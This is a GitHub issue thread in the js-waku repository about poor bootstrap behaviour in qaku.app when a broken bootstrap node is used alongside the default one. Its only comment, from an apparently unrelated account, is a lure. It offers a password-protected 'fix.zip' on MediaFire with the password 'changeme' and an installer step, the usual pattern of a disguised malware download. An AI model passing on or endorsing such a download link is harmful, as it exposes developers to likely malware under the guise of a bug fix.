### ISSUE TITLE
bug: investigate bootstrap and improve bootstrap experience with broken nodes

### ISSUE THREAD

**Issue by weboko** [waku-org/js-waku#2113]
This is a **support request**

## Problem

When https://qaku.app/ is used with broken bootstrap node AND default bootstrap - experience degrades significantly.

## Proposed Solutions

Investigate

## Notes

Discussion: https://discord.com/channels/1110799176264056863/1276606979502112889/1276607690264678420

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
